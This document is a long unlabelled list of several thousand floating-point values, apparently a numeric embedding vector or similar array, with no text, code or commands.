0.015555783174932003, -0.011039108969271183, 0.025540011003613472, -0.015451781451702118, 0.02227136492729187, 0.010571097955107689, -0.008134471252560616, 0.014835195615887642, -0.03185443952679634, -0.008803058415651321, -0.02665432170033455, -0.002308481140062213, -0.0051629748195409775, 0.0391048938035965, -0.05161489173769951, -0.02047361060976982, 0.0022007646039128304, 0.015206633135676384, -0.01075681671500206, -0.03877802938222885, -0.005809275433421135, 0.004902969114482403, -0.010645385831594467, -0.002590773394331336, 0.011529405601322651, 0.009486502036452293, 0.030814416706562042, -0.01070481538772583, -0.0018534709233790636, 0.02702575922012329, 0.00007811785326339304, -0.01981988176703453, 0.03054698370397091, 0.005248405504971743, 0.018913574516773224, -0.008795629255473614, -0.013379162177443504, -0.005207547452300787, -0.008104756474494934, -0.003593653440475464, 0.026104595512151718, 0.014560332521796227, 0.033459048718214035, 0.009092778898775578, 0.014292897656559944, -0.012807149440050125, -0.03640083223581314, 0.024693135172128677, 0.006685866974294186, -0.03574709966778755, -0.012888865545392036, 0.016640380024909973, -0.008639626204967499, 0.002068904461339116, 0.014092321507632732, 0.020042743533849716, -0.015540925785899162, 0.02219707891345024, 0.036489974707365036, -0.011425403878092766, 0.022865664213895798, 0.0029826394747942686, 0.037529997527599335, 0.01692267134785652, -0.021246198564767838, 0.020845046266913414, 0.04133351519703865, -0.030606413260102272, 0.0034785079769790173, -0.019909026101231575, -0.012190563604235649, 0.051941756159067154, -0.01479062344878912, -0.0018813286442309618, -0.010043657384812832, -0.016982102766633034, -0.020221032202243805, 0.0027764919213950634, 0.01889871619641781, -0.04706850275397301, -0.017487255856394768, 0.03544995188713074, 0.021944500505924225, -0.01589750498533249, -0.0051778326742351055, 0.0034636505879461765, -0.011819127015769482, 0.02482685260474682, 0.03485565260052681, 0.006433289498090744, -0.028630368411540985, -0.009761366061866283, 0.0017513256752863526, 0.030012113973498344, 0.020830189809203148, 0.02830350399017334, 0.009776223450899124, 0.02112733945250511, 0.023534251376986504, 0.020934192463755608, 0.009115065447986126, -0.01895814761519432, 0.05574527382850647, 0.06584835797548294, -0.017873549833893776, 0.008543051779270172, -0.015526068396866322, -0.03010125830769539, -0.01710096187889576, -0.001833041780628264, 0.04008548706769943, -0.009761366061866283, -0.029833823442459106, -0.0027374911587685347, 0.016699809581041336, 0.003992948215454817, 0.0018711141310632229, -0.013044869527220726, -0.0059504215605556965, -0.021885070949792862, -0.0076070306822657585, -0.020800475031137466, 0.007465884555131197, 0.008921917527914047, -0.0025350579526275396, 0.031081851571798325, -0.026490889489650726, 0.02785777859389782, 0.0007767677307128906, 0.005905848927795887, -0.027530914172530174, 0.0023010524455457926, -0.028793800622224808, 0.028214357793331146, -0.01377288531512022, -0.016432374715805054, 0.007473313249647617, -0.001091096317395568, 0.026669180020689964, 0.027218906208872795, 0.017219820991158485, 0.01146254688501358, 0.03565795719623566, -0.02934352681040764, 0.00416380912065506, -0.00124338548630476, -0.024930855259299278, 0.024782279506325722, 0.00988022517412901, 0.007577315904200077, -0.004932683892548084, 0.011432832106947899, -0.0006421217694878578, -0.0006992302369326353, 0.0076070306822657585, 0.02230107970535755, 0.0017494685016572475, 0.008691626600921154, -0.013936318457126617, -0.006853013765066862, 0.0011458833469077945, -0.021216483786702156, 0.01730896718800068, 0.01259914506226778, 0.0015813931822776794, 0.004104379564523697, -0.023920545354485512, -0.015288349241018295, -0.0281697865575552, -0.03102242201566696, -0.008075041696429253, 0.0009648077539168298, 0.0370248444378376, 0.02143934555351734, -0.018764998763799667, 0.01592721976339817, -0.052595485001802444, -0.017531828954815865, 0.024470273405313492, -0.002156191971153021, -0.0446913056075573, 0.023771971464157104, 0.015110058709979057, 0.0091373510658741, 0.011157969012856483, 0.022122791036963463, 0.0017113961512222886, 0.0057052732445299625, 0.0156003562733531, -0.00588727742433548, 0.005534411873668432, -0.012963153421878815, 0.035152800381183624, 0.009404785931110382, 0.01692267134785652, 0.01782897859811783, 0.015184346586465836, 0.03987748175859451, 0.03874831274151802, 0.00021218341134954244, -0.041452374309301376, -0.008825344033539295, -0.0008023040136322379, 0.0013659597607329488, 0.021290771663188934, -0.012264851480722427, 0.037589430809020996, 0.002087476197630167, -0.011811697855591774, -0.012398568913340569, 0.017799263820052147, 0.012339138425886631, 0.016283800825476646, -0.010177374817430973, 0.011625980027019978, -0.011744839139282703, 0.012576858513057232, -0.02010217308998108, 0.011261971667408943, -0.008773342706263065, 0.02420283854007721, -0.030814416706562042, 0.008899631910026073, 0.022984525188803673, 0.008297903463244438, 0.01468662079423666, -0.018883859738707542, -0.01022194791585207, -0.028140069916844368, 0.024678276851773262, 0.0032853607553988695, -0.0008905203430913389, -0.007573601324111223, 0.00029807823011651635, 0.037946008145809174, -0.0005998708074912429, -0.00860248226672411, -0.033667054027318954, 0.031735580414533615, 0.0001459051127312705, -0.0013724599266424775, -0.012732861563563347, 0.04112550988793373, -0.002960353158414364, -0.03761914372444153, -0.02143934555351734, 0.013869459740817547, 0.0026632037479430437, -0.008795629255473614, 0.0008478050585836172, -0.02068161405622959, -0.016640380024909973, 0.013602024875581264, 0.024797137826681137, -0.0220633614808321, 0.014441472478210926, -0.0031553576700389385, 0.02472284995019436, -0.01692267134785652, 0.015808360651135445, 0.02068161405622959, -0.007525314576923847, 0.0140848932787776, -0.03013097308576107, -0.0016231798799708486, 0.015228918753564358, -0.02033989317715168, 0.0187501423060894, 0.00942707248032093, -0.023727398365736008, -0.024633705615997314, -0.011945415288209915, -0.0029492101166397333, -0.0065261488780379295, 0.004394100047647953, 0.002013188786804676, 0.005352407693862915, -0.0042938124388456345, 0.004642962943762541, -0.03833230212330818, -0.02423255331814289, 0.01927015371620655, 0.010764245875179768, 0.006500148214399815, 0.00996194127947092, 0.027768634259700775, -0.03678712621331215, -0.0060247089713811874, 0.029046377167105675, 0.0036140824668109417, -0.00498097063973546, -0.03916432335972786, -0.016536377370357513, 0.015169489197432995, -0.01965644769370556, 0.0014792480506002903, 0.0400557704269886, 0.007165020797401667, -0.008312760852277279, 0.028466936200857162, 0.014374613761901855, 0.00031827512430027127, -0.016298657283186913, 0.0025443437043577433, 0.0013761742739006877, 0.0004940112703479826, 0.028392648324370384, 0.009048206731677055, -0.007733319420367479, -0.026089739054441452, 0.024693135172128677, 0.01163340825587511, -0.00918935239315033, -0.014471187256276608, 0.0197901651263237, -0.04091750457882881, -0.010303664021193981, -0.04189809784293175, 0.030279548838734627, -0.014731192961335182, 0.028986947610974312, 0.005816704127937555, -0.012673432007431984, -0.01730896718800068, -0.0038926603738218546, 0.008015611208975315, -0.00934535637497902, -0.0018581137992441654, -0.015028342604637146, 0.004483245313167572, -0.0016742524458095431, -0.023430248722434044, -0.015778645873069763, -0.05200118571519852, -0.006351573392748833, -0.00856533832848072, 0.015540925785899162, -0.018185557797551155, -0.01600150763988495, -0.0009620219352655113, -0.017041532322764397, 0.013564880937337875, -0.01549635361880064, -0.002211907645687461, -0.01799241080880165, -0.02585201896727085, -0.02096390724182129, -0.030220117419958115, -0.015318064019083977, 0.006849299184978008, 0.0015293920878320932, -0.023638254031538963, 0.025346864014863968, 0.008245902135968208, -0.006273571867495775, 0.014330041594803333, 0.04908911883831024, 0.013698598369956017, 0.04177923873066902, -0.054794393479824066, -0.01091282069683075, -0.0013121013762429357, -0.028764085844159126, 0.0005097973626106977, -0.001411460805684328, 0.0046095335856080055, -0.002260194392874837, 0.02133534476161003, 0.007770462892949581, 0.004323527216911316, 0.0009536645957268775, -0.007889322936534882, -0.0014328183606266975, 0.01950787380337715, -0.016952386125922203, 0.001495962729677558, -0.0008686984074302018, -0.030294405296444893, 0.007919037714600563, -0.006277285981923342, 0.01097967941313982, -0.012168277986347675, 0.007369311060756445, -0.007191021461039782, -0.03149786219000816, -0.034766506403684616, -0.010496811009943485, 0.014062606729567051, 0.005946706980466843, -0.01961187645792961, 0.021454203873872757, 0.015243776142597198, 0.011261971667408943, -0.016194654628634453, -0.010244233533740044, -0.025465723127126694, -0.001537749427370727, -0.015763787552714348, -0.0016658951062709093, -0.020221032202243805, -0.0069830166175961494, 0.010467096231877804, -0.03212187439203262, 0.004587247502058744, 0.006994159426540136, 0.008045326918363571, -0.028318360447883606, -0.004936398472636938, 0.021944500505924225, -0.002191478619351983, -0.020503325387835503, 0.03286474943161011, -0.00468753557652235, 0.0059504215605556965, -0.012071704491972923, -0.029462385922670364, -0.003699512919411063, 0.025540011003613472, -0.002765348879620433, 0.019879311323165894, -0.025391437113285065, 0.01382488664239645, -0.012279708869755268, -0.01895814761519432, -0.00670443894341588, 0.04127408564090729, -0.006448147352784872, 0.002468199236318469, 0.012866578996181488, 0.016952386125922203, -0.0061695692129433155, -0.008728770539164543, -0.020815331488847733, 0.02978925034403801, -0.014070034958422184, 0.0010260948911309242, 0.03812429681420326, 0.0042195250280201435, -0.002161763608455658, -0.015318064019083977, 0.003673512488603592, -0.011833984404802322, -0.009196781553328037, -0.02892751805484295, -0.014902054332196712, 0.0012303852709010243, -0.018839286640286446, -0.007361882366240025, 0.01861642487347126, 0.022702232003211975, -0.0174723993986845, -0.004460958763957024, -0.004104379564523697, 0.0312007125467062, -0.008060184307396412, -0.02057761326432228, 0.0004640641564037651, 0.0200278852134943, 0.013230587355792522, -0.019403871148824692, -0.0007558743818663061, -0.0017401825170964003, -0.0015795360086485744, 0.007822464220225811, 0.023341104388237, 0.02606002241373062, -0.022211935371160507, 0.0030866418965160847, -0.004776680376380682, -0.02444055862724781, -0.001395674655213952, 0.03253788501024246, -0.03637111559510231, -0.022464511916041374, 0.02088961936533451, 0.0029974968638271093, 0.023950260132551193, -0.01177455484867096, -0.008706483989953995, -0.01156654953956604, -0.0218256413936615, -0.018556995317339897, 0.012287137098610401, -0.00832761824131012, -0.031141282990574837, -0.002161763608455658, 0.02496057003736496, -0.02320738695561886, -0.015288349241018295, 0.010489381849765778, 0.00907049234956503, 0.009233924560248852, -0.008639626204967499, 0.013869459740817547, 0.022939952090382576, -0.03984776511788368, 0.033637337386608124, -0.009248782880604267, 0.04727650806307793, -0.04154152050614357, 0.01968616433441639, -0.011440261267125607, -0.00792646687477827, -0.018571851775050163, 0.009924798272550106, 0.015674643218517303, -0.018913574516773224, -0.02430684119462967, 0.03381562978029251, -0.02585201896727085, -0.010942535474896431, -0.016491804271936417, -0.012235136702656746, 0.016313515603542328, 0.014590047299861908, -0.0034915083087980747, 0.026119453832507133, 0.019626732915639877, 0.0031516433227807283, -0.02712976187467575, 0.021736495196819305, 0.0009629505220800638, -0.003647511824965477, -0.0063070012256503105, -0.014174037612974644, -0.014998627826571465, 0.02516857348382473, -0.0070053027011454105, -0.02020617574453354, 0.018007267266511917, -0.03640083223581314, 0.01074195932596922, 0.0009555218275636435, -0.010949964635074139, -0.004434958565980196, -0.0130671551451087, -0.02375711314380169, -0.007205878850072622, 0.003218502039089799, 0.008179043419659138, 0.013713455758988857, 0.008944204077124596, 0.00996194127947092, 0.07482227683067322, 0.016536377370357513, -0.01665523648262024, -0.010816247202455997, -0.020696472376585007, -0.030873848125338554, 0.020562754943966866, -0.023222243413329124, 0.024217694997787476, -0.010429952293634415, 0.02285080775618553, -0.019938740879297256, 0.016179798170924187, 0.019210724160075188, 0.005296692252159119, 0.010987107641994953, -0.018423277884721756, 0.02140963077545166, 0.030294405296444893, -0.02164735086262226, 0.007499313913285732, 0.01806669868528843, -0.0010558097856119275, -0.01479062344878912, 0.0248565673828125, -0.01906214840710163, 0.01549635361880064, -0.03054698370397091, -0.031943585723638535, -0.00370137020945549, 0.0050404006615281105, -0.0014021748211234808, -0.004605819471180439, -0.01892843283712864, 0.0012861008290201426, -0.003066212870180607, 0.008520766161382198, 0.010890534147620201, -0.005838990211486816, -0.009902511723339558, -0.015436924062669277, -0.00538583705201745, -0.011469976045191288, -0.013096869923174381, 0.0038815170992165804, 0.013988318853080273, 0.017219820991158485, -0.03316190093755722, -0.0031293572392314672, 0.021706780418753624, -0.004186095669865608, -0.04650392010807991, 0.025881733745336533, -0.009077921509742737, 0.0117894122377038, -0.0027542056050151587, -0.02371254190802574, 0.0021041908767074347, 0.0059987083077430725, 0.0018395419465377927, -0.011135682463645935, 0.005824132822453976, -0.002011331729590893, -0.010533954948186874, 0.007465884555131197, -0.013460878282785416, 0.00023841614893171936, -0.0034079349134117365, -0.01754668541252613, 0.0024811995681375265, 0.008089899085462093, -0.010407665744423866, 0.0022249079775065184, -0.002156191971153021, 0.02323710173368454, 0.019537588581442833, 0.012183135375380516, 0.01623922772705555, -0.003829516004770994, -0.0037533713039010763, 0.00306435558013618, -0.00018119162996299565, -0.01023680530488491, 0.03036869317293167, -0.01300029642879963, 0.048970259726047516, -0.006726725026965141, -0.013587167486548424, 0.005638414528220892, 0.01861642487347126, -0.014382042922079563, 0.008780771866440773, 0.01889871619641781, 0.0018562566256150603, 0.010608241893351078, 0.019597018137574196, 0.009077921509742737, -0.020934192463755608, -0.02772406116127968, -0.010697387158870697, -0.001381745794788003, -0.006500148214399815, -0.001935187028720975, -0.01579350419342518, 0.005512125790119171, 0.004431243985891342, -0.0017392539884895086, 0.03057669848203659, 0.023935403674840927, -0.00762931676581502, -0.05012914538383484, -0.007603316567838192, 0.009694507345557213, 0.004836110398173332, -0.02354910969734192, 0.03316190093755722, -0.004394100047647953, 0.010608241893351078, 0.024009691551327705, 0.00008548855839762837, -0.02427712455391884, 0.006607864983379841, 0.017561543732881546, -0.00033638268359936774, 0.00011085074220318347, 0.018259845674037933, -0.02402454800903797, -0.006953301373869181, 0.035212233662605286, 0.010645385831594467, 0.010452238842844963, 0.023519393056631088, 0.020726187154650688, 0.004420100711286068, 0.010259090922772884, -0.02482685260474682, 0.03381562978029251, 0.016491804271936417, -0.03467736393213272, 0.013007725588977337, -0.0042046671733260155, 0.0359848216176033, 0.013720884919166565, -0.009991656988859177, 0.0023567681200802326, 0.004910397808998823, 0.0077778915874660015, -0.006515005603432655, -0.015199203975498676, 0.03146814554929733, 0.005333836190402508, -0.02472284995019436, 0.012242564931511879, 0.022806234657764435, 0.012963153421878815, -0.018839286640286446, 0.016937529668211937, 0.005434123799204826, 0.008082469925284386, 0.025525154545903206, 0.020949048921465874, 0.002468199236318469, 0.00791160948574543, -0.010533954948186874, -0.004423815291374922, 0.04154152050614357, 0.0074621704407036304, -0.04498845711350441, -0.04258154332637787, 0.002189621329307556, 0.021587921306490898, 0.02299938164651394, 0.005337550304830074, 0.006875299848616123, 0.01686324179172516, 0.018319275230169296, -0.008505908772349358, 0.026743467897176743, 0.002007617149502039, -0.0029547817539423704, -0.017918122932314873, 0.004995828494429588, 0.004056092351675034, 0.008082469925284386, 0.00856533832848072, 0.00473210820928216, 0.020399322733283043, 0.012339138425886631, -0.0471576489508152, 0.02282109297811985, 0.014196324162185192, 0.0446913056075573, -0.003118213964626193, -0.019701020792126656, 0.009902511723339558, 0.0051369741559028625, 0.020414181053638458, -0.006656151730567217, 0.0002222818584414199, 0.03375620022416115, -0.000980593846179545, 0.005155546125024557, -0.005066401325166225, 0.01806669868528843, -0.0013223158894106746, -0.005281834863126278, -0.00665243761613965, -0.0011235970305278897, -0.008580195717513561, -0.0481976717710495, -0.0032835034653544426, 0.0250942874699831, -0.031052136793732643, -0.019106721505522728, 0.01311915647238493, -0.006682152394205332, -0.004119236953556538, -0.015147202648222446, 0.00008461800462100655, -0.01634323038160801, -0.00009593522554496303, 0.009404785931110382, -0.019849596545100212, -0.006295857951045036, -0.029358385130763054, 0.02822921611368656, 0.00705730402842164, -0.01074195932596922, 0.00848362222313881, 0.0042195250280201435, 0.0033856485970318317, 0.005441552959382534, -0.005081258714199066, 0.010519097559154034, -0.009687078185379505, -0.02950695902109146, 0.0027467769104987383, 0.0009281283128075302, -0.018779857084155083, 0.007673889398574829, 0.0018348990706726909, -0.009954513050615788, -0.006396146025508642, 0.006269857287406921, 0.011952844448387623, -0.0002769527491182089, 0.015659786760807037, -0.005816704127937555, -0.026802897453308105, 0.026208598166704178, 0.001329744583927095, -0.008929346688091755, -0.0006258714129216969, 0.0009731650934554636, 0.0005446195718832314, -0.0070795901119709015, 0.01585293374955654, 0.016729524359107018, -0.007517885882407427, 0.021261056885123253, 0.01765068806707859, -0.007038732059299946, 0.012851721607148647, 0.016016365960240364, 0.012725433334708214, 0.03140871599316597, -0.021186769008636475, -0.016878100112080574, -0.0028024925850331783, 0.019909026101231575, -0.005564127117395401, 0.006448147352784872, 0.007458455860614777, 0.007785320747643709, -0.012725433334708214, -0.005266977474093437, -0.016744382679462433, -0.01965644769370556, 0.019567303359508514, 0.0006973730633035302, -0.012762577272951603, 0.04448330029845238, 0.008223616518080235, -0.04320555925369263, 0.006117568351328373, -0.018155843019485474, -0.02172163873910904, -0.0174723993986845, -0.0037849436048418283, -0.02151363343000412, -0.015162060037255287, 0.017145534977316856, -0.021573062986135483, -0.020072458311915398, 0.025228004902601242, -0.005233548115938902, -0.01071967277675867, 0.020874762907624245, -0.011469976045191288, -0.007763034198433161, 0.0075587439350783825, 0.013542594388127327, 0.013230587355792522, 0.007536457851529121, -0.014396900311112404, 0.021365059539675713, 0.011826555244624615, -0.0034302212297916412, -0.015147202648222446, -0.004427529405802488, 0.0019017576705664396, -0.014359756372869015, -0.015288349241018295, 0.00043829571222886443, -0.015704357996582985, -0.008164186030626297, -0.0023734827991575003, 0.00467267818748951, -0.04210610315203667, 0.012160848826169968, -0.0004954041796736419, -0.005560412537306547, -0.02623831294476986, 0.025540011003613472, 0.01626894250512123, -0.00664500892162323, -0.016358086839318275, -0.009315641596913338, -0.0034320782870054245, -0.015882648527622223, 0.016937529668211937, 0.0010149517329409719, 0.020013028755784035, 0.019299868494272232, -0.00844647828489542, -0.001895257504656911, 0.03836201876401901, -0.015466638840734959, -0.012235136702656746, -0.010214518755674362, -0.031913872808218, -0.011440261267125607, -0.013951175846159458, 0.005515840370208025, 0.01249514240771532, -0.005129545461386442, 0.04139294475317001, 0.00387780275195837, 0.009003633633255959, -0.020384464412927628, -0.024009691551327705, 0.010600813664495945, 0.026312600821256638, 0.025005141273140907, 0.008253331296145916, -0.005467553157359362, -0.011655694805085659, -0.005898420233279467, 0.007228164933621883, 0.004509245976805687, -0.024113692343235016, -0.006492719519883394, -0.009991656988859177, -0.0015990365063771605, 0.021157054230570793, -0.009508788585662842, -0.006470433436334133, 0.010251662693917751, -0.012242564931511879, -0.005879848264157772, 0.021974215283989906, 0.009271068498492241, 0.043799858540296555, -0.005530697759240866, -0.02099362201988697, 0.006162140518426895, 0.02822921611368656, -0.0390157476067543, 0.010400237515568733, 0.023014239966869354, -0.008312760852277279, -0.0014123893342912197, 0.0018172557465732098, -0.0017383253434672952, 0.0008728770771995187, 0.014827767387032509, -0.018943289294838905, -0.0008078755927272141, -0.04240325465798378, 0.003014211542904377, -0.009330498985946178, -0.026773182675242424, 0.0156003562733531, -0.004178666975349188, 0.018631283193826675, 0.0028990660794079304, -0.00009796652011573315, 0.006344144698232412, -0.0187501423060894, -0.007547600660473108, 0.002915780758485198, 0.005928135477006435, 0.007302452344447374, 0.00774817680940032, 0.0044386726804077625, 0.014144322834908962, -0.005679272580891848, -0.03812429681420326, 0.02099362201988697, -0.007309881038963795, 0.017799263820052147, -0.0035657957196235657, 0.006091567687690258, -0.03943175822496414, -0.02733776718378067, -0.008914489299058914, -0.002919495105743408, 0.00007916252070572227, 0.008387048728764057, -0.0012359567917883396, -0.0006119425524957478, -0.02085990458726883, -0.027010902762413025, 0.002028046175837517, -0.0018571852706372738, -0.011157969012856483, 0.03987748175859451, -0.005415552295744419, -0.028110355138778687, -0.019151294603943825, -0.019091865047812462, 0.016209512948989868, 0.0016491805436089635, 0.009701935574412346, 0.019017577171325684, 0.02020617574453354, 0.009523645974695683, -0.004787823650985956, 0.009063064120709896, -0.0005525125889107585, -0.00733588170260191, -0.01087567675858736, 0.0073395962826907635, -0.0037422282621264458, -0.003523080376908183, -0.018497565761208534, -0.0008552338113076985, -0.010697387158870697, -0.011960272677242756, -0.003021640470251441, 0.010645385831594467, 0.01232428103685379, 0.01661066524684429, -0.0026780611369758844, 0.0013325304025784135, -0.006867871154099703, -0.009991656988859177, 0.0029046377167105675, -0.003918660804629326, 0.00007759551954222843, 0.006080424413084984, -0.015095201320946217, 0.004527817480266094, 0.0010390951065346599, 0.011351116001605988, 0.02088961936533451, 0.000806018419098109, -0.0006625508540309966, 0.017710117623209953, 0.01028880663216114, 0.023415392264723778, -0.00739531172439456, -0.010957392863929272, 0.014864910393953323, 0.013312303461134434, -0.025837160646915436, -0.00851333700120449, 0.010600813664495945, 0.0012415283126756549, -0.015087773092091084, 0.01762097328901291, 0.019329583272337914, -0.011083681136369705, -0.0004120629746466875, -0.0010084515670314431, 0.052446912974119186, -0.011373402550816536, 0.010296234861016273, -0.017799263820052147, 0.006061852443963289, 0.0013408877421170473, -0.00537840835750103, -0.0065038627944886684, -0.0040969508700072765, 0.018244987353682518, -0.0032315023709088564, 0.007495599798858166, 0.02840750478208065, 0.0060952818021178246, 0.013631739653646946, 0.010585956275463104, -0.007309881038963795, 0.0005107259494252503, 0.0006620865315198898, -0.011477405205368996, -0.003933518193662167, -0.027263479307293892, -0.0027282051742076874, 0.015050629153847694, -0.007651603315025568, 0.001610179548151791, 0.006596722174435854, -0.01947815902531147, 0.01710096187889576, -0.004836110398173332, -0.0072987377643585205, -0.010214518755674362, -0.007733319420367479, -0.007421312388032675, 0.0004617426893673837, 0.01782897859811783, 0.006685866974294186, 0.003974376246333122, -0.010868247598409653, 0.013899174518883228, 0.02020617574453354, 0.008996205404400826, 0.01889871619641781, -0.010563669726252556, -0.0077036041766405106, 0.012903722934424877, -0.003372648498043418, -0.00040277704829350114, 0.008543051779270172, -0.012621430680155754, 0.005029257852584124, 0.011930557899177074, 0.004022663459181786, 0.0055455551482737064, -0.02650574781000614, 0.008312760852277279, -0.0078596081584692, -0.002358625177294016, 0.02819950133562088, -0.024485129863023758, -0.011477405205368996, 0.0077927494421601295, -0.015095201320946217, 0.0032575028017163277, -0.0015368207823485136, -0.006084138993173838, -0.019834738224744797, -0.008684198372066021, 0.007651603315025568, -0.0019296155078336596, -0.009508788585662842, -0.0011523833964020014, -0.011811697855591774, -0.017918122932314873, 0.005237262230366468, -0.01616493985056877, -0.004995828494429588, 0.0167592391371727, -0.0005051543703302741, 0.0133048752322793, 0.02616402506828308, -0.01011794526129961, 0.005838990211486816, -0.004546389449387789, -0.012086561881005764, 0.01005108654499054, -0.005311549641191959, 0.014062606729567051, -0.005010685883462429, -0.007829893380403519, 0.0005260477191768587, 0.011143111623823643, -0.01497634220868349, 0.009843082167208195, -0.011484833434224129, 0.015102630481123924, 0.013037440367043018, -0.011908271349966526, -0.015228918753564358, -0.0009555218275636435, -0.021216483786702156, 0.029937826097011566, -0.015956936404109, -0.0021190482657402754, -0.0027022045105695724, 0.038213443011045456, 0.014463759027421474, -0.0027560628950595856, 0.02882351540029049, -0.019314726814627647, -0.010325949639081955, -0.011373402550816536, 0.00537840835750103, 0.0029752107802778482, 0.015585498884320259, -0.01830441690981388, 0.013587167486548424, 0.02365311048924923, 0.006321858614683151, -0.007540171965956688, 0.002843350637704134, 0.01071967277675867, -0.012457998469471931, -0.008104756474494934, -0.02678803913295269, -0.010593384504318237, -0.009025920182466507, -0.004067235626280308, 0.017279252409934998, 0.005597556475549936, -0.020607328042387962, 0.006176997907459736, -0.004538960754871368, 0.0029269240330904722, -0.013505451381206512, -0.00027602416230365634, -0.0029343527276068926, -0.013832315802574158, -0.0006922658067196608, -0.019106721505522728, 0.01537749357521534, 0.01579350419342518, -0.017056388780474663, 0.005486125126481056, 0.002592630684375763, 0.0140848932787776, -0.012353995814919472, -0.01451575942337513, 0.00769617548212409, 0.00699044531211257, 0.02582230418920517, 0.0038109440356492996, -0.01733868196606636, 0.010853390209376812, -0.0034227923024445772, -0.004516674671322107, -0.002822921611368656, -0.019329583272337914, -0.011321401223540306, 0.015318064019083977, -0.010207090526819229, 0.015659786760807037, -0.007521599996834993, -0.0016157511854544282, 0.0036865125875920057, 0.020607328042387962, -0.0017253251280635595, -0.0007544815307483077, 0.02292509377002716, 0.013401448726654053, -0.012264851480722427, 0.01456776075065136, 0.011767125688493252, -0.0067230104468762875, 0.013936318457126617, 0.018348990008234978, 0.024395985528826714, 0.0024199122563004494, 0.004178666975349188, 0.006433289498090744, -0.008632197044789791, -0.012562001124024391, 0.0312007125467062, 0.006440718192607164, 0.0045129600912332535, 0.016298657283186913, -0.00844647828489542, -0.003573224414139986, 0.004052378237247467, -0.005864990875124931, -0.0023511964827775955, 0.003400506218895316, -0.009672220796346664, 0.007495599798858166, 0.001433747005648911, -0.011915700510144234, 0.017576400190591812, -0.02068161405622959, -0.021216483786702156, -0.027114905416965485, -0.009493931196630001, 0.001684466958977282, 0.026253171265125275, 0.004212096333503723, 0.0009049135260283947, 0.01775469072163105, 0.021053051576018333, 0.017115818336606026, -0.029016662389039993, 0.007172449491918087, -0.04070949926972389, -0.01934444159269333, 0.020666757598519325, 0.0008696269942447543, -0.001700253109447658, 0.0001090515943360515, -0.0024347698781639338, 0.01858671009540558, -0.009033349342644215, 0.0024849139153957367, -0.00929335504770279, -0.0015423923032358289, 0.006927301175892353, -0.006414717994630337, 0.0034302212297916412, 0.00999908521771431, 0.012405997142195702, -0.002061475533992052, -0.006994159426540136, -0.00856533832848072, 0.012287137098610401, -0.004119236953556538, -0.010355665348470211, 0.03286474943161011, -0.01173741091042757, -0.005708987358957529, 0.025049714371562004, 0.009575647301971912, -0.012101419270038605, -0.014575189910829067, 0.005129545461386442, 0.004063521511852741, -0.01485748216509819, -0.012457998469471931, -0.013334590010344982, 0.01329001784324646, -0.00855048093944788, 0.022315938025712967, -0.004312383942306042, -0.000024839851903379895, -0.007963609881699085, 0.008751057088375092, -0.02062218450009823, -0.0014012462925165892, 0.005500982515513897, 0.013735742308199406, -0.013037440367043018, 0.012064275331795216, 0.01303001120686531, -0.011113396845757961, -0.006481576710939407, -0.003855516668409109, 0.014018034562468529, -0.023281674832105637, 0.004598390776664019, -0.010318521410226822, 0.012405997142195702, 0.004312383942306042, -0.0030717842746526003, 0.003552795387804508, -0.0051035452634096146, -0.005270691588521004, -0.009909940883517265, 0.0031163569074124098, -0.006485290825366974, -0.0009336998919025064, 0.017947837710380554, 0.013215729966759682, 0.01730896718800068, 0.009553360752761364, -0.012242564931511879, 0.006277285981923342, -0.023251960054039955, -0.028674939647316933, -0.015704357996582985, -0.00780760683119297, 0.008231044746935368, 0.025287434458732605, -0.015570641495287418, 0.020176460966467857, -0.020726187154650688, 0.003749656956642866, -0.010333378799259663, -0.020354749634861946, -0.011291686445474625, 0.017115818336606026, 0.009791080839931965, -0.019002718850970268, 0.022672517225146294, 0.02112733945250511, -0.011417974717915058, -0.013037440367043018, -0.011232255958020687, 0.010957392863929272, -0.005604985170066357, -0.005701558664441109, -0.005014399997889996, -0.005474982317537069, 0.006418432109057903, -0.006440718192607164, -0.008713913150131702, -0.012168277986347675, 0.01005108654499054, -0.01497634220868349, -0.019017577171325684, 0.0059504215605556965, -0.029833823442459106, -0.0010799532756209373, -0.016536377370357513, 0.00832761824131012, 0.022390225902199745, 0.01185627095401287, -0.0017596830148249865, 0.014226038940250874, 0.005991279613226652, -0.009679649025201797, -0.015570641495287418, -0.017739834263920784, 0.003855516668409109, -0.019775308668613434, 0.030220117419958115, -0.004550104029476643, 0.01158140692859888, 0.02864522486925125, 0.020161602646112442, 0.00624757120385766, 0.0021190482657402754, 0.0036085108295083046, -0.007369311060756445, 0.011759696528315544, -0.012784862890839577, -0.0010270234197378159, -0.017368396744132042, -0.004037520848214626, -0.01600150763988495, 0.004249239806085825, 0.01785869337618351, -0.006084138993173838, -0.020429037511348724, 0.01236142497509718, -0.023697683587670326, -0.012851721607148647, -0.000330811133608222, 0.0005961564602330327, 0.009739079512655735, -0.009583075530827045, 0.003651226172223687, 0.019671306014060974, -0.005166689399629831, -0.011759696528315544, -0.01788840815424919, -0.013706027530133724, 0.001798683893866837, 0.0035546524450182915, -0.014270611107349396, -0.005166689399629831, 0.004193524364382029, -0.0008236616267822683, -0.014003177173435688, -0.0032760747708380222, -0.022598229348659515, -0.0006871585501357913, 0.00045965335448272526, -0.003699512919411063, -0.00982822384685278, 0.003376362845301628, -0.0014913197373971343, 0.0035769387613981962, -0.025153717026114464, -0.005679272580891848, 0.0014309611869975924, -0.018571851775050163, 0.012755148112773895, -0.0169969592243433, 0.003248217049986124, -0.012524857185781002, -0.019418729469180107, 0.008075041696429253, 0.019567303359508514, 0.004011520184576511, 0.00034938298631459475, -0.005259548779577017, 0.002083761850371957, -0.029432671144604683, -0.005612413864582777, 0.017294108867645264, -0.0019166151760146022, -0.027382338419556618, 0.012457998469471931, -0.0033392191398888826, 0.006737867835909128, 0.02451484464108944, 0.005913277622312307, 0.015332921408116817, -0.0169969592243433, -0.009300783276557922, -0.0036289398558437824, 0.015035771764814854, 0.030145831406116486, 0.028036069124937057, 0.004557532723993063, 0.00653357757255435, 0.001983473775908351, 0.00062169274315238, 0.010080801323056221, 0.0014188895002007484, -0.000006949935595912393, 0.012651145458221436, 0.009872796945273876, 0.004442387260496616, 0.017739834263920784, 0.0012907437048852444, -0.013141443021595478, 0.008505908772349358, 0.011239685118198395, 0.010675100609660149, 0.009523645974695683, -0.009003633633255959, 0.008409334346652031, 0.013668883591890335, 0.004728393629193306, -0.0091373510658741, -0.005415552295744419, -0.025005141273140907, 0.000034677130315685645, 0.010526525788009167, -0.014575189910829067, 0.01340887788683176, 0.004449815955013037, -0.007075875997543335, -0.018497565761208534, 0.014107178896665573, 0.017145534977316856, -0.0038889457937330008, -0.0009058421128429472, 0.006927301175892353, 0.002340053441002965, 0.03078470192849636, 